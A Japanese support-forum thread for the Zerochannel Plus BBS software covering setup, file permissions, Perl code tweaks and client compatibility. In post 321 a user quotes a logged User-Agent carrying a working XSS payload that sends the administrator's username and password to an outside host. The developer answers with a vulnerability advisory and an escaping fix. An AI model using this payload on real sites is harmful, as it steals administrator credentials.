■掲示板に戻る■ 全部 1- 101- 201- 301- 401- 501- 601- 701- 801- 901- 最新50 [PR]ぜろちゃんねるプラス[PR]  
レス数が1000を超えています。残念ながら全部は表示しません。

ぜろちゃんねるプラス質問スレ

1 :windyakin ★:2011/07/10(日) 16:29:56.74 ID:???0
■ぜろちゃんねるプラスWiki
http://sourceforge.jp/projects/zerochplus/wiki/FrontPage

271 :0ch+開発担当 ◆0chp.sx.ik :2013/01/06(日) 19:25:35.23 ID:tW6XWQZQ0
>>270
>Apacheが落ちました。
症状からほぼ間違いなくデッドロック状態になっているようですね。
コマンドが実行できるなら「fuser -k (パス省略)/2000000000.dat」を試してみてください。

>flock(1)
もちろんそうすれば動作すると思いますが、datファイルが破壊される可能性を
できるだけ排除したかったため読み込み専用かどうかに関わらずflock(2)にしています。

272 :名無しさん@ぜろちゃんねるプラス:2013/01/06(日) 19:52:58.66 ID:W2M9GVgU0
>>271
レスありがとうございます。
>datファイルが破壊される可能性をできるだけ排除
そうですね、一番ダメージが大きいです。

fuser -kでデッドロックは解除できますが、再発するため404を
read.cgiにベタ書きしようと思います。ありがとうございました。

273 :0ch+開発担当 ◆0chp.sx.ik :2013/01/07(月) 20:07:42.47 ID:8RNGJvcI0
>>272
今更ですが、デッドロックの原因が判明しました。
そちらではSpeedyCGIを使用しているようですが、プロセスが終了しないために
ファイルがクローズされず、結果としてデッドロックが発生していたようです。

次のリリースで修正しておきますが、
必要であればread.cgiのsub PrintReadSearchの最後に
  $Dat->Close();
の1行を加えてください

274 :名無しさん@ぜろちゃんねるプラス:2013/01/08(火) 00:54:42.95 ID:QiYUOYO+0
>>269前半:
>r.cgiが500を返す
対策後で、存在しないスレッドキーでテストしたところ、1003というコードが返ってきました。
これは意味のあるコードなんでしょうけれど、ぱっと見でよくわからないので、
「404を返す」とかはどうしょう?

# 対象スレッドが見つからなかった場合は404を返す
if ($err == $ZP::E_PAGE_FINDTHREAD) {
$Page->Print("Status: 404 Not Found\n");
}

>>269後半:
「ofuda.ccのアカウント名を入力 (未入力でカウンター非表示)」 の下に、
「上記に付加される文字列」 というような、デフォルトで“0000”が入った
入力バーを追加しておくとかどうでしょうね?
0000を付けるっていうことは、相手は気分次第で文字列をいじってくるかもしれないですし。

275 :0ch+開発担当 ◆0chp.sx.ik :2013/01/08(火) 20:44:10.80 ID:98+4yVy+0
>>274
>404を返す
そうですね、そのようにしておきます。
r.cgiはまだまだ管理が行き届いていませんが、少しずつ改良していきたいと思います。

>入力バーを追加
この設定は見た目を2ch風に突き詰めた結果できたものなので、おまけ程度に考えてください。
ofuda.cc専用の設定というのは少し不恰好なので、将来的にはこの設定自体をなくして
全体的な拡張性を考えてテンプレートか新しいプラグインシステムを導入したいと考えています。

276 :名無しさん@ぜろちゃんねるプラス:2013/01/09(水) 08:56:52.15 ID:3XwsUs6A0
/log/に作られる***_old.cgiってたまに削除したほうがいいですか?
放っておくとサーバーに負担がかかったりしますか?

277 :0ch+開発担当 ◆0chp.sx.ik :2013/01/09(水) 20:47:28.86 ID:aliGGqhA0
>>276
*_oldログは肥大化してもおそらく負荷はかからないはずです。
ただし溜まる一方なので、定期的に手動で削除するのがいいと思います。

278 :276:2013/01/10(木) 12:04:28.12 ID:XlEarNUk0
>>277
わかりました、ありがとうございます。

279 :名無しさん@ぜろちゃんねるプラス:2013/01/13(日) 01:26:51.57 ID:b+5lG9vUi
ぜろちゃんねるで「落ちないスレ」を作る事は出来るでしょうか?
スクリプト次第でしょうか?

280 :0ch+開発担当 ◆0chp.sx.ik :2013/01/13(日) 20:03:29.83 ID:jfaiNkpQ0
>>279
0ch本家でもプラスでも落ちないスレッドの機能はありません。
ですが、少し前にも話題になりましたが今後実装する予定です。

具体的には、スレッドに属性を付加できるシステムを導入することで
落ちないスレッドだけでなくいろんな機能が実装できると考えています。
・不落属性:下がるが落ちないスレッド
・不沈属性:下がらないため落ちないスレッド(924スレッド)

281 :名無しさん@ぜろちゃんねるプラス:2013/01/15(火) 22:51:05.36 ID:6h7vF0Z+0
初歩的なことかもしれないのですが質問させていただきます。

atpagesのサーバを借りてぜろちゃんねるプラスを設置しました。
掲示板の作成まではうまくいったのですが、その掲示板にスレッドを作成しようとすると、

404 Error - Not Found
指定されたページ(URL)は見つかりません。

と表示され、作成できません。

何が問題なのでしょうか。

なお、関係あるのかは分からないのですが、
パーミッション設定は、ffftpを使って、Wikiにある「一般的なレンタルサーバでの設定例」に、
基本設定のCGI設置ディレクトリは/testに、それぞれ設定してあり、
0chオリジナル設定の「掲示板読取専用」の欄は「書き込み可」を選んであります。

282 :0ch+開発担当 ◆0chp.sx.ik :2013/01/16(水) 19:49:24.94 ID:7azmKB+I0
>>281
>基本設定のCGI設置ディレクトリ
この設定が間違っています。「/ユーザー名/test」としてください。
その後掲示板一覧から「index更新」をしてください。

283 :名無しさん@ぜろちゃんねるプラス:2013/01/16(水) 20:36:24.75 ID:60MBPNBI0
>>282
ありがとうございます。

ご指摘の通り変更し、スレッドを作成しようとしたところ、今回は「書き込み確認&クッキー確認」の画面までは進めたのですが、
「上記全てを承諾して書き込む」をクリックすると、

500 Error - Internal Server Error
CGIもしくはSSIが正しく動作していません。

が表示され、エラーになってしまいます。
重ねてのことになりますがご指導をお願いします。

その下の、「以下の状況が考えられます」の一つにパーミッションの問題を指摘する文がありますが、
パーミッションの設定に問題があるのでしょうか?

パーミッションについて、ffftpから属性変更するものに関しては>>281の通りwikiにしたがい、
管理画面のシステム設定→パーミッション設定から設定するものに関しては、
wikiのパーミッションの設定の項に記述がなかったため、
0ch BBS Script (ver.4.xx) wikiの方のパーミッションの設定の項にある、基本的なパーミッションの通りに設定してあります。

284 :0ch+開発担当 ◆0chp.sx.ik :2013/01/16(水) 22:51:37.24 ID:7azmKB+I0
>>283
システム設定のパーミッション設定はそのままで動作します。
ファイルのパーミッションは最低限test/*.cgiを755にするだけで動作するはずです。

スレッド作成しようとするたびに「書き込み確認」ページがでますか?

285 :名無しさん@ぜろちゃんねるプラス:2013/01/16(水) 23:09:17.90 ID:60MBPNBI0
>>284
書き込み確認ページに飛ぶのは最初だけです。
以降は、「新規スレッド作成」をクリック→500エラー表示となります。
クッキーを削除すればまた書き込み確認ページが出ます。

一応、testディレクトリ下の*.cgiのパーミッションを755にして試してみましたが、同じく500エラーとなってしまうようです。

286 :0ch+開発担当 ◆0chp.sx.ik :2013/01/17(木) 20:55:53.30 ID:HRiGvZl20
>>285
一度0ch+のファイルをすべて削除してからアップロードし直して
*.cgiだけパーミッションを設定してください。
他のファイルは設定する必要ありません。

管理画面にログインしたら基本設定とパーミッション設定は
いじらずにデフォルトのままで試してみてください。

これでも同じようにエラーが出る場合はエラー内容を確認しない限り
こちらでこれ以上対処することはできません。

287 :名無しさん@ぜろちゃんねるプラス:2013/01/17(木) 22:03:06.22 ID:H7Rvxm2M0
>>286
作成できました!

削除&再アップロードを行い、なにも設定をいじらず掲示板作成→スレッド作成を行い、
読み取り専用とのエラーが出たため、0chオリジナル設定の掲示板読取専用だけ「書き込み可」に設定し、再度ためしたところ、成功しました。

ただ、現在上記とログインの設定以外は、ご指導いただいた通りなにも設定をいじっていない状態です。
パーミッションをいじらないのは危険にも思えるのですが、へたにいじってしまうとまたエラーが発生してしまうかもしれません。

各種パーミッションの設定等は、今後どの程度行えばよいものでしょうか?
ひとつひとつ設定していき、どのパーミッションが問題だったかを突き止めることもできなくはないかもしれませんが……

また、wikiで変更するよう記述のある基本設定に関しても、どの程度まで設定を変更してよいものでしょうか?

288 :0ch+開発担当 ◆0chp.sx.ik :2013/01/17(木) 23:48:53.50 ID:HRiGvZl20
>>287
>パーミッションをいじらないのは危険にも思えるのですが
そもそもファイルのパーミッションはアップロードした時点で大抵644になっているので
「基本的なパーミッション」では*.cgi以外のファイルをわざわざ設定し直す必要がありません。

セキュリティを考慮するのであれば「suEXEC対応サーバーでのパーミッション設定」の通りに設定してください。
ディレクトリとファイルのパーミッションは別ですので気をつけてください。これが原因だったかもしれません。
ちなみにperllibとplugin_confのディレクトリはすべて700、ファイルはすべて600です。

システム設定のパーミッション設定はセキュリティを考慮すれば上から順に
604 604 600 600 404 700 704 700 です。間違ってたらすみません。

289 :0ch+開発担当 ◆0chp.sx.ik :2013/01/17(木) 23:51:48.56 ID:HRiGvZl20
>基本設定に関して
0ch+では自動設定されるようになっているので基本的に変更する必要はありません。
本家0chとは少し違うので設定する際は気をつけてください。

290 :名無しさん@ぜろちゃんねるプラス:2013/01/18(金) 21:15:54.15 ID:Y0INKUlM0
>>288-289
なるほどそうでしたか。
うまく設定できました。

大変助かりました。ありがとうございます。

291 :名無しさん@ぜろちゃんねるプラス:2013/01/24(木) 16:33:35.10 ID:bczjQJZg0
お世話になっております
携帯用の最初のページで表示されるスレッドの数は変更できますでしょうか?
この板だとhttp://yakin.38-ch.net/zerochplus/i/のスレッド数です

292 :0ch+開発担当 ◆0chp.sx.ik :2013/01/24(木) 20:01:57.03 ID:o0baiZ7Q0
>>291
indexに表示されるスレッドの数はPC・携帯で共通の設定になっています。
掲示板設定->その他設定->indexスレッドプレビュー数 がその設定項目です。

携帯版のみ変更したい場合はmodule/varda.plの151行目付近の
  my $menuNum = $Set->Get('BBS_MAX_MENU_THREAD');

  my $menuNum = 20;
のように書き換えてください。

p.cgiにも同様の変更を施したい場合はp.cgiの242行目付近の
  $max = $start + $Set->Get('BBS_MAX_MENU_THREAD');
を同様に書き換えてください。

293 :名無しさん@ぜろちゃんねるプラス:2013/01/24(木) 20:15:37.26 ID:bczjQJZg0
>>292
ありがとうございます

無知で申し訳ないのですがmodule/varda.plとp.cgiの両方を変更する場合と
どちらか片方変更する場合はどう違うのでしょうか?

また携帯版にAASリンクが表示されますがこれを非表示にすることは可能でしょうか?

294 :293:2013/01/24(木) 20:38:43.94 ID:bczjQJZg0
AASの件は自己解決しました


295 :0ch+開発担当 ◆0chp.sx.ik :2013/01/24(木) 20:47:10.85 ID:o0baiZ7Q0
>>293
varda.plはindex.htmlの生成に関わっています。
indexから「続き」のリンクを辿るとp.cgiで続きのスレッドが一覧で表示されます。
例えばvarda.plのみ20に変更するとindexは20個表示されますが、
続きのページを見ると10個ずつしか表示されないといった状況になります。
両方書き換えておくのが無難でしょう。

AASのリンクを削除するならr.cgiの392行目付近の
  $Page->Print("<hr>[$n]$elem[0]</b>:$elem[2]<br><a href=\"$obama\">AAS</a><br>$elem[3]<br>\n");
の行から「<a href=\"$obama\">AAS</a><br>」を削ってください。

296 :名無しさん@ぜろちゃんねるプラス:2013/01/24(木) 20:51:37.93 ID:bczjQJZg0
>>295
なるほど
お忙しい中丁寧なご回答ありがとうございました
では一度やってみます

297 :名無しさん@ぜろちゃんねるプラス:2013/01/28(月) 17:53:17.79 ID:TEu6aF7k0
お世話になっております
ぜろちゃんねるのsearch.cgiの件ですが、当方では不要なのでこれを利用させないようにしたいと思っています
例えばsearch.cgiを削除した場合何か弊害が出たりしますでしょうか?

298 :windyakin ★:2013/01/28(月) 18:57:25.18 ID:???0
>>297
特にないです。消してくれて構いません。

299 :名無しさん@ぜろちゃんねるプラス:2013/01/28(月) 19:05:00.77 ID:TEu6aF7k0
>>298
了解しました
ご返答ありがとうございました

300 :名無しさん@ぜろちゃんねるプラス:2013/01/30(水) 03:49:05.17 ID:1auAeU4+0
xreaに設置した「ぜろちゃんねるプラス」をAndroidの2chMateから
外部板で読み込む所までは大丈夫だったのですが、
書き込みを行うと「302 Found」になってしまいました。
でも http://yakin.38-ch.net/stable/ こちらだと書き込み出来ます。
アップしてパーミッション設定してIDとパス変えて新しく板を作った
だけなのですが、「またテスト@1」は他にも何かしてるのでしょうか。

301 :名無しさん@ぜろちゃんねるプラス:2013/01/30(水) 03:50:41.00 ID:1auAeU4+0
すみません、↑ですが「BBS_READONLY=none」は設定しています。

302 :0ch+開発担当 ◆0chp.sx.ik :2013/01/31(木) 19:38:43.56 ID:59jNlei+0
>>300
板を設置した階層がマズイのではないでしょうか。
例えば、板 ttp://example.jp/path/bbs1/ を登録するとdatの読み込みはできますが、
書き込み時に適切なCGI ttp://example.jp/path/test/bbs.cgi にアクセスされないようです。

設置場所を一般的な階層に移動するか、他の類似アプリを使用するか、
それがダメなら2chMate開発者に改善要望を出すしかないと思います。

303 :名無しさん@ぜろちゃんねるプラス:2013/02/01(金) 15:13:57.08 ID:s58eN/460
おっしゃる通り階層の問題でした。
これで思うように使えます。
適切なご回答ありがとうございました。

304 :名無しさん@ぜろちゃんねるプラス:2013/02/28(木) 12:26:26.46 ID:rSIaizxI0
真面目な質問じゃなくて与太話レベルで聞いて欲しいのですが、
とあるサーバー(wkey.me)でぜろちゃんねるプラスを動かしたら
専ブラV2Cでスレッドを開くと404で閲覧できない(何故か書き込みは可能)という謎の現象が発生しました。w
JaneDoeViewや通常ブラウザでは普通に見れるというのがさらに謎です。
なお、別のサーバー(atpages)では問題なく普通に使えました。

305 :0ch+開発担当 ◆0chp.sx.ik :2013/03/02(土) 22:53:43.16 ID:+pv+oQ1A0
>>304
それは確かに謎の挙動ですね。
時間があるときに検証してみます。

306 :名無しさん@ぜろちゃんねるプラス:2013/03/24(日) 03:18:18.16 ID:3vAQdL6E0
板作成時にアクセス解析のスクリプトタグが入るようにしたいんだけど
どこに追加すればいいですか?

307 :0ch+開発担当 ◆0chp.sx.ik :2013/03/24(日) 14:28:08.02 ID:f8OA+cqE0
>>306
板作成後でPC版indexページのみなら
管理画面の各掲示板->各種編集->フッタの編集 で貼り付けてください。
何か書き込むなりしてindexを更新すると反映されます。

このフッタのデフォルトを書き換えたい場合は
test/datas/default_fot.txtを直接編集してください。

またread.cgiや携帯版のすべてのページにも貼り付けたい場合は
かなり手間になりますがプログラムの以下の各部分を直接書き換えてください。
 read.cgiのPrintReadFoot、PrintReadSearch、PrintReadError、PrintDiscovery
 r.cgiのPrintReadFoot、PrintReadSearch、PrintReadError
 p.cgiのPrintFoot
 mordor/varda.plのCreateIIndex

308 :名無しさん@ぜろちゃんねるプラス:2013/03/30(土) 21:15:10.83 ID:t3ReIxrc0
告知欄の表示を消そうと、[システム設定]→[表示設定]→
告知欄表示(index.html以外の告知欄を表示するのチェックをOFF)
としましたが、index更新をしても告知欄が表示されてしまいます。

/test/info/system.cgiも「BANNER<>0」となっているんですが、
他にどこかおかしいところがあるのでしょうか?
サーバーはatpages.jpです。

309 :0ch+開発担当 ◆0chp.sx.ik :2013/03/31(日) 11:33:57.57 ID:s1zwz8bw0
>>308
indexの告知欄を非表示にする設定はありません。

module/varda.pl の367行目付近 PrintIndexMenu内
  # バナーの表示
  $this->{'BANNER'}->Print($Page, 95, 0, 0);

  $this->{'BANNER'}->Print($Page, 95, 0, 0) if ($Sys->Get('BANNER'));
このように書き換えれば>>308の設定でindexの告知欄も非表示にできます。

310 :名無しさん@ぜろちゃんねるプラス:2013/03/31(日) 15:29:22.27 ID:MJuLdHQ+0
>>309
ありがとうございます。
そのままではエラーになったので、直前に
my $Sys = $this->{'SYS'};
を付け加えました。

311 :名無しさん@ぜろちゃんねるプラス:2013/04/01(月) 11:17:05.63 ID:xW8Vx00s0
>>302
これと同様の問題かと思いますが、atpages.jpだと
atpages.jp/hogehoge/boo/ に掲示板が作成され
atpages.jp/hogehoge/test/bbs.cgiにアクセスできないかと思います。
設置する掲示板は1つだけ(追加予定なし)なのですが、
一部の専ブラ等でも動作するようにするには、どのファイルをどこに移動
若しくはファイルのどこを書き換えればいいのでしょうか?


312 :0ch+開発担当 ◆0chp.sx.ik :2013/04/01(月) 12:40:06.04 ID:cQiAh6ow0
>>310
すみません、それでOKです

>>311
専ブラが決め打ちでhttp://server/test/bbs.cgiにアクセスする仕様だと
掲示板を設置する側では対処のしようがありません。
結局その専ブラの作者に要望を出して改善してもらうしかないと思います。

313 :名無しさん@ぜろちゃんねるプラス:2013/04/23(火) 15:39:41.57 ID:l3/MsvoE0
0.7.1を使わせてもらっています。日付の2013/04/23(火)の所を
皇紀2673/04/23(火)とか平成25/04/23(火)のように表示することって
出来ますか?

314 :0ch+開発担当 ◆0chp.sx.ik :2013/04/23(火) 19:22:17.14 ID:lTqFgR820
>>313
galadriel.pl の sub GetDate 内 877行目付近の
  $str .= sprintf('%04d/%02d/%02d', $info[5], $info[4], $info[3]);

  $str .= sprintf('%s/%02d/%02d', YearString($info[5]), $info[4], $info[3]);
のように変更して、
同ファイル内に以下のような関数を加えるといいと思います
  sub YearString {
    my ($year) = @_;
    my $str;
    # ここで西暦から和暦等に変換して$strに代入
    return $str;
  }
具体的な変換はそちらで調べて実装してください

315 :名無しさん@ぜろちゃんねるプラス:2013/04/23(火) 21:10:14.17 ID:v/yqGszYI
スレの自動圧縮を実装したいのですが、どうしたら良いでしょうか?

316 :0ch+開発担当 ◆0chp.sx.ik :2013/04/23(火) 23:19:45.06 ID:lTqFgR820
>>315
どんなタイミングでどのファイルをどう処理したいのか、もう少し具体的に書いてください

dat落ちなどでプールに移動した時に自動で圧縮を行いたいのであれば
・vara.plの192行目付近
・bbs.thread.plの615行目付近
・bbs.thread.plの828行目付近
の3箇所のEARENDIL::Copyの処理を圧縮処理に変えて
・bbs.pool.plの396行目付近
のEARENDIL::Moveの処理を解凍処理に変えればdatファイルごとに圧縮されます

あるいは一定期間間隔か一定数でプールのスレをまとめて圧縮したいのであれば
vara.plの196行目付近の $Pools->Save($Sys); のあとで時間経過などを判定して、
$path/poolフォルダをまるごと圧縮してから、poolフォルダの中身を空にする処理を行うといいでしょう

317 :313:2013/04/24(水) 10:48:20.54 ID:OnZEf2cE0
>>314
ありがとうございます。やってみます。

318 :名無しさん@ぜろちゃんねるプラス:2013/04/24(水) 18:31:40.10 ID:c6uFst0AI
>>316
ありがとうございます

319 :名無しさん@ぜろちゃんねるプラス:2013/04/27(土) 18:26:38.24 ID:RhFL9bykI
iPhoneからは出来ますか?

320 :0ch+開発担当 ◆0chp.sx.ik :2013/04/28(日) 12:30:48.58 ID:ynDOhixw0
>>319
iPhoneから0ch+の掲示板を利用することはできます。
ただし今のところiPhone/スマホ専用のページは無いので
PC版と同じページで利用することになります。

2chブラウザアプリをインストールして外部板として登録すれば
アプリから利用することも可能です。
確認はできませんが、Apple Storeのガイドラインの関係で
2chブラウザアプリが削除されているかもしれません。

321 :名無しさん@ぜろちゃんねるプラス:2013/04/29(月) 22:10:14.08 ID:RGma0O2E0
>目についた脆弱性は修正しましたが、全て確認しているわけではないので未修正のものがあるかもしれません

>もし未修正の脆弱性やバグを見つけたら報告してくれるとありがたいです

さっきログ見てたらUAにこんなのが

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)<span id=uho style=display:none></span><script>onload=function(){document.getElementById("uho").innerHTML="<img border=0 src=//serot.ktkr.net/cgibin/picture/up/env.php?"+document.getElementsByName("UserName").item(0).value+":"+document.getElementsByName("PassWord").item(0).value+":"+escape(location)+" width=0 height=0>";}</script>


322 :0ch+開発担当 ◆0chp.sx.ik :2013/04/29(月) 22:59:15.35 ID:SputaUes0
>>321
これは…
レス一覧を表示するとユーザー名とパスワードが抜かれてしまいます
パスワードを変更しておいてください


◆◆ぜろちゃんねるプラスで掲示板を管理している皆さまへ◆◆
管理画面でレス一覧のページを開くとパスワードが抜かれてしまう脆弱性が発見されました。
この脆弱性はバージョン0.5.x頃から0.7.1まで存在しています。

今すぐにユーザーのパスワードを変更して、
./test/mordor/thread.res.pl の sub PrintResList 内の
  $Page->Print("<hr>HOST:$logs[5]<br>IP:$logs[6]<br>UA:$logs[8]") if (defined $log);
の行を削除するか <br>UA:$logs[8] の部分を削除してください。

323 :名無しさん@ぜろちゃんねるプラス:2013/05/04(土) 23:57:47.52 ID:nent5BeE0
一部の専ブラ(iPhone:BB2C)からスレを閲覧しようとすると「スレッド内のレスポンスを取得できません」と出ます。
因みに、ゼロちゃんねるプラスさんのサンプルサイトのスレッドは問題なくロード出来ました。
他の専ブラでは通常通りロードができます。


324 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 06:28:39.45 ID:oV3rgJgI0
>>322
これって管理画面に入るのが自分だけの場合削除しなくても問題ないですか?
$Page->Print("<hr>HOST:$logs[5]<br>IP:$logs[6]<br>UA:$logs[8]") if (defined $log);
を削除したらRes ListからHOST、IP、UAが見れなくなってしまって、
<br>UA:$logs[8]だけを削除したらHOST、IPは見れるけどUAが見れなくなってしまいました。

325 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 12:16:52.19 ID:ktKReKVM0
>>323
自己解決しました

326 :0ch+開発担当 ◆0chp.sx.ik :2013/05/05(日) 12:30:50.61 ID:7+61J/kI0
>>323
iPhoneを持っていないのでこちらでは確認ができませんが、
考えられる理由として階層の問題があります。

掲示板の設置が以下のような階層だと、いくつかのアプリでは読み書きできません。
 ttp://server.jp/user1/test/bbs.cgi
 ttp://server.jp/user1/bbs1/
2chに近い以下のような階層ならほとんどのアプリで読み書きできると思います。
 ttp://user1.server.jp/test/bbs.cgi
 ttp://user1.server.jp/bbs1/
ただこれはアプリとサーバーの問題で、0ch+ではこれ以上対処することが出来ません。


>>324
今回の脆弱性はXSSで、具体的に言えば
・悪意のある人がUAにスクリプトを仕込んで書き込む
・管理者が管理画面からレス一覧を表示するとスクリプトが実行されてしまう
というもので、レス一覧のページを誰が表示してもアウトです。

UAをそのまま表示していたのが問題なので、その行の前に以下の行を追加すればOKです。
  $logs[8] =~ s/</&lt;/g;

327 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 13:57:58.18 ID:WPLSKRug0
admin.cgiでログインして、キャップ、ユーザー等のリンクをクリックしましたが、
何度も何度もクリックしてもabout:blankの状態です。

対処法を教えて下さい。

328 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 14:43:37.54 ID:WPLSKRug0
全部削除してまたうpしたらperllibしか無くなりました
どうなってますか?

329 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 16:19:18.16 ID:WPLSKRug0
http://www51.atpages.jp/~bourbon/dat/
この板ですが、スレを立てようとするとエラーが置きます。
対処法はどうすればいけるのでしょうか?
連投すみません。回答下さい

330 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 17:03:43.05 ID:WPLSKRug0
http://www51.atpages.jp/~bourbon/1/
こっちでしたごめんなさい

331 :0ch+開発担当 ◆0chp.sx.ik :2013/05/05(日) 17:35:34.79 ID:7+61J/kI0
>>327-330
情報量が少ないので原因の特定はできません。
もう少し設置手順などを詳しく教えて下さい。

・パーミッションの設定は適切ですか?
test/*.cgiだけ755、他のファイルは弄らずデフォルトの状態でいいです。

・管理画面からの設定
基本設定とパーミッション設定は弄らずデフォルト推奨です。

332 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 19:30:27.17 ID:WPLSKRug0
>>331
もう一度設定しなおしてみましたが、駄目でした。
デフォルトというのはFFFTPにUPした時のそのままの状態ですよね?

333 :0ch+開発担当 ◆0chp.sx.ik :2013/05/05(日) 19:57:26.26 ID:7+61J/kI0
>>332
ダメでしたか…
ちょっとこちらでも検証してきます。

334 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 19:58:13.25 ID:WPLSKRug0
>>333
ありがとうございます。

335 :0ch+開発担当 ◆0chp.sx.ik :2013/05/05(日) 20:31:41.72 ID:7+61J/kI0
原因が判明したかもしれません。
FFFTPの設定でファイル名がすべて小文字にされていませんか?
オプション->環境設定->転送2->ファイル名の変更 の部分です
このせいでperllibの中身が正常に読み込めずにエラーになったのだと思われます。

336 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 20:39:08.77 ID:WPLSKRug0
今perllibの中身を開いてみましたが、3つのフォルダの中を見ようとするとエラーがでました。
どうすればいいでしょうか?

337 :0ch+開発担当 ◆0chp.sx.ik :2013/05/05(日) 20:41:30.73 ID:7+61J/kI0
再接続かF5で更新してファイル一覧を読込しなおしてみてください

338 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 20:44:04.89 ID:WPLSKRug0
550 Digest: No such file or directory
というエラーが出ます。

339 :0ch+開発担当 ◆0chp.sx.ik :2013/05/05(日) 20:47:19.53 ID:7+61J/kI0
なるほど、FFFTPの設定が原因ではなかったですね
その3つのフォルダのパーミッションを755に再設定してください

340 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 20:48:12.30 ID:WPLSKRug0
ありがとうございます!
読取り専用になりました!設定で変えるだけでスレ立てられます!
ありがとうございました!

341 :名無しさん@ぜろちゃんねるプラス:2013/05/05(日) 23:12:03.01 ID:ktKReKVM0
特定の専ブラからAAを書き込もうとするとAAが途中で切れてしまいます。
何か対処法はありますか?

342 :名無しさん@ぜろちゃんねるプラス:2013/05/06(月) 01:08:31.82 ID:W/ZWa+Cc0
私も>>304と同じ状態です。
サーバーもwkey.meと同様です

343 :324:2013/05/06(月) 06:51:55.26 ID:0Gkeh/PU0
>>326
ありがとうございました。

344 :名無しさん@ぜろちゃんねるプラス:2013/05/06(月) 09:42:53.58 ID:wtmNGNHk0
               /|:::::::::::::::::::::ヽ.:.:.:.:、:.:.:.:、:.:.:.、.:.、.:.:.:.:.:.::`゛>
           /{::|:\:::::::\.:.:.:\.:.:.ヽ::.::.ヽ:.:.ヽ::::::::::.:.`゛ー- ..,__
: 何 :    /:|::',: ト、::::::ヽ、:.\:.:.:.\:.:.ヽ:.:.:\.:.:.:.:.:::.:.:.:.:::.::::_

345 :0ch+開発担当 ◆0chp.sx.ik :2013/05/06(月) 12:38:30.65 ID:NbW7qBDc0
>>341,>>344
使用したブラウザや書き込もうとしたAAのオリジナルなど、
もう少し具体的なことを教えて下さい。

>>304,>>342
検証して来ました。
結論から言えば .htaccess に以下の行を追加してください。
  AddType text/plain .dat

以下、wkey.meで0ch+を設置した手順です。
1. ~/.htaccess に以下の3行を記述
  Options +ExecCGI
  AddType application/x-httpd-cgi .cgi
  AddType text/plain .dat
2. zerochplus_0.7.1.zipの test フォルダをまるごと ~/web/ に転送
3. パーミッションを以下のとおり設定
  ~/web : 0770
  ~/web/test : 0771
  ~/web/test/*.cgi : 0755
4. admin.cgi にログインし、デフォルト設定で掲示板を設置

346 :0ch+開発担当 ◆0chp.sx.ik :2013/05/06(月) 13:18:22.20 ID:NbW7qBDc0
ちょっと訂正です
x: 1. ~/.htaccess に以下の3行を記述
o: 1. ~/web/.htaccess に以下の3行を記述

x: 3. パーミッションを以下のとおり設定
o: 3. パーミッションを以下のとおり設定(SuEXECでない場合)
x:   ~/web : 0770
o:   ~/web : 0710


3. パーミッションを以下のとおり設定(SuEXECの場合)
  ~/web : 0710
  ~/web/* : 0640 (ファイル)
  ~/web/test : 0710
  ~/web/test/*.cgi : 0700
  ~/web/test/datas : 0710
  ~/web/test/datas/* : 0640 (ファイル)
  ~/web/test/* : 0700 (ディレクトリ)
  ~/web/test/* : 0600 (ファイル)
管理画面でのパーミッション設定(上から順に)
640 640 600 600 440 700 710 700

347 :名無しさん@ぜろちゃんねるプラス:2013/05/06(月) 14:17:01.53 ID:W/ZWa+Cc0
ありがとうございます

やってみます

348 :名無しさん@ぜろちゃんねるプラス:2013/05/06(月) 14:28:27.03 ID:wtmNGNHk0
>>345
iPhoneブラウザアプリ「Twinkle」

元AAはこれです
http://netyougo.com/aa/4805.html

349 :名無しさん@ぜろちゃんねるプラス:2013/05/06(月) 14:55:52.53 ID:W/ZWa+Cc0
出来ました

ありがとうございます(^ω^)

350 :0ch+開発担当 ◆0chp.sx.ik :2013/05/06(月) 15:09:34.61 ID:NbW7qBDc0
>>348
iPhoneを持っていないので確認はできませんが、途切れた部分を比較して原因を推定すると
Twinkleの内部処理で本文のURLエンコーディングが不完全なのではないかと思われます。

具体的には、書き込みデータ中の「;」が「%3B」に変換されておらず、
0ch+側で区切り文字「;」と解釈されてデータがそこで区切られたのだと思われます。
0ch+側で「;」を区切り文字として解釈しなければ書き込めますが、
これはRFC 3986で定められている仕様なので根本的解決にはなりません。

Twinkleの作者さんにURLエンコードをしっかりしてもらうように
要望を出すのがベストな解決法だと思います。

ここまで書きましたが一応推定です。
↓こちらのスレで「;」を含む書き込みを何度かテストしてみてください。
http://yakin.38-ch.net/test/read.cgi/stable/1294667112/l50

351 :名無しさん@ぜろちゃんねるプラス:2013/05/06(月) 15:17:37.52 ID:PeLTotnA0
>>350
丁寧な説明ありがとうございました


352 :名無しさん@ぜろちゃんねるプラス:2013/05/06(月) 15:25:02.75 ID:W/ZWa+Cc0
今度は管理画面でこんな表示が毎回出るようになってしまったのですが対処法がわかりません。。。
お願いします

サイト "………….wkeya.com" にユーザ名 "……………" でログインしようとしていますが、Web サイトは認証を必要としていません。このサイトはあなたをだまそうとしている可能性があります。

サイト "………….wkeya.com" に接続しますか?

353 :名無しさん@ぜろちゃんねるプラス:2013/05/06(月) 15:46:19.64 ID:0v7EnDJ60
Sambaについて質問です。

1)vara.plのスレッド作成モードはチェックを行っていないように見えますが意味はあるのでしょうか
2)同一ホストで複数行のログが残りますが正しいのでしょうか
3)vara、peregrin以外でSambaの処理を行っている部分はありますでしょうか

354 :0ch+開発担当 ◆0chp.sx.ik :2013/05/06(月) 16:10:55.79 ID:NbW7qBDc0
>>351
一時しのぎの対処法ですが、「;」をすべて「;」に書き換えるといいと思います。
ただし後ろが数字でない場合のみです。「;123」は「」に書き換えられません。

>>352
Firefoxの警告文のようですが、こちらでは再現出来ませんでした。
URLにユーザー名が含まれるとこうなることがあるみたいです。
おそらく接続しても問題ありません。

>>353
1) スレッド作成はそれ用の規制が2種類あるので、Sambaでスレ立ての規制はしていません。

2) Samba時間内であろうとなかろうと、書き込もうとするとタイマーがリセットされるようになっています。
  また、ログは書き換えをせず追記するようにしています。
  この2つのことからログが複数行残ることになります。

3) その2ファイルのみです。

